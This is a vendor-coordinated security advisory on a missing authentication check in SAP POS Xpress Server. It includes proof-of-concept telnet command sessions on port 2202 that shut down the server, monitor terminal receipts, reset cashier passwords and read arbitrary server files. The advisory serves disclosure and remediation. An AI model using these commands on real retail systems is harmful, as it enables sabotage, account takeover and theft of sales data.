[ERPSCAN-17-032] SAP POS Missing Authentication in XpressServer
Application: SAP POS Xpress Server
Vendor URL: SAP
Bug: Missing Authentication Check
Reported: 15.05.2017
Vendor response: 16.05.2017
Date of Public Advisory: 11.07.2017
Reference: SAP Security Note 2520064
Author: Vladimir Egorov (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication Check
Impact: broken authentication
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS v3 Base Score: 8.1 / 10
CVSS v3 Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | High (H) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | High (H) |
I: Impact to Integrity | High (H) |
A: Impact to Availability | High (H) |
Description
An attacker can read and clear file content on SAP POS server, shutdown the Xpress Server application, monitor POS terminals content and brute-force cashiers login and password.
Business risk
An attacker can use a Missing Authorization Check vulnerability to access a service without any authorization procedures and use service functionality that has restricted access. This can lead to information disclosure, privilege escalation and other attacks.
VULNERABLE PACKAGES
XPRESSBU 1020
XPRESSBU 1030
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2520064
TECHNICAL DESCRIPTION
An attacker can read and clear file content on SAP POS server, shutdown the Xpress Server application, monitor POS terminals content and brute-force cashiers’ login and password through Xpress Server TCP port 2202 without authentication.
For that, an attacker can connect to servers port 2202 using telnet. The welcome message shows the Xpress Servers version and name. “Help” command discovers some possible actions:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
999 *** XPRESS SERVER MOST COMMON COMMAND HELP *** 999 MONXPS [ON|OFF] 999 [SHOWTERM|TERMINAL-STATUS] [ALL|Term#] 999 [MONTERM|MONITOR-TERMINAL] [ALL|XPS|Term#] [START|STOP|ON|OFF] 999 OPEN-TERMINAL [ALL|Term#] 999 OPEN-STORE [TODAY|NumberOfSecsSinceJan1-1970] 999 CLOSE-TERMINAL [ALL|Term#] [FORCE|NO-FORCE|ABORT] 999 TERMINAL-BALANCE [Term#] [BAL|UNBAL] 999 CASHIER-BALANCE [Cashier#] [1|2|3] [ShortOver Amount] [netTenderTotal] <-- 1=BALANCED 2=UNBALANCED 3=PREVIOUS BALANCE NOW OUT OF DATE 999 UPDATE-CASHIER [Cashier#] 999 DELETE-CASHIER [Cashier#] 999 END-OF-DAY [FORCE|NO-FORCE|ABORT] 999 STORE-TOTALS [CLOSE-DAY|CLOSE-WEEK|CLOSE-PERIOD|DONE-END-OF-DAY|...] 999 STORE-TOTALS CONSOL-DAY [RTOT|SRTOT|CTOT|SPROD|...] 999 COMMS-RESET [1|2|3] <-- 1=ALL 2=REMOTE 3=MODEMS 999 FLUSH-PLUCACHE 999 TRIGGER-NEWPROMOS 999 SHUTDOWN 999 . <-- Use to repeat previous command |
Nonetheless, there are some additional commands:
1 2 3 4 5 6 7 |
APM-validate-Passwd APM-Reset-Passwd FILE-OPEN [file-path] [mode] FILE-FIND [file_path] FILE-READ [file_id] [buff_size] FILE-SEEK [file_id] [offset] [origin] FILE-TELL [file_id] |
The most critical commands are provided below.
SHOWTERM
Show active and non-active terminals of the system and Backup Server, including Store Number, terminal number cashier and its number.
PoC
1 2 3 4 |
SHOWTERM ALL 100 0 0 STORE-OPEN BACKUP SERVER: NOT CONNECTED 100 1 0 01 CASHIER 1111 100 9999 0 END-OF-TERMINAL-STATUS |
MONTERM
Let the user monitor all what ever appears on the receipt window of the POS terminal.
PoC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
MONTERM 1 102 1 SALESPERSON # 1111 102 1 POTTERS BRANDY 1.75L 1000 p1.00 L 102 1 REGULAR PRICE 12.99 102 1 SUBTOTAL $1.00 102 1 5% LOCAL TAX $0.05 102 1 T O T A L $1.05 102 1 V I S A $1.05 102 1 4***********1111 102 1 PURCHASE 102 1 KEYED 102 1 LOCAL 102 1 AUTH# 102 1 LOCAL 102 1 INVOICE #: 405 102 1 2017-04-02 20:26:09 102 1 CUSTOMER ZIP CODE 1111111111 102 1 ITEMS 1 102 1 2017-04-02 20:26:10 102 1 000001 01 1111 0405 102 1 ------------------------------------------ |
RUNEOD AND TERMACTION
Initialize End of Day and sign off from POS terminal.
PoC
1 2 |
RUNEOD 0 1001 1 TERMACTION 1 1002 0 ACTION=Signoff;Term=1; |
SHUTDOWN
Shutdown the Xpress Server application.
PoC
1 2 |
SHUTDOWN Connection closed by foreign host. |
APM-VALIDATE-PASSWD
Change the current cashier`s password (need to check it) on the new one.
PoC
1 2 3 4 5 6 7 |
APM-Validate-Passwd 0 1124 1 1111;1234567a # Validate the current password 1124 0 1 1 Disp=Authenticated;APMCode=0; APM-Reset-Passwd 0 1125 1 1111;7654321a # If all`s ok, change password on the new one 1125 0 1 1 Disp=Authenticated;APMCode=0; UPDATE-CASHIER 1111 # Apply the new setting in database 170 CASHIER-UPDATED 1111 Audit-Modify-Emp-Passwd 1111 1111 # ??? |
FILE-OPEN AND FILE-READ
Read data from any file on server.
PoC
1 2 3 4 5 6 7 8 9 10 11 12 13 |
FILE-OPEN C:\windows\win.ini 160 FILE-OPEN 0 FILE-READ 0 120 162 FILE-READ 0 120 EGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo |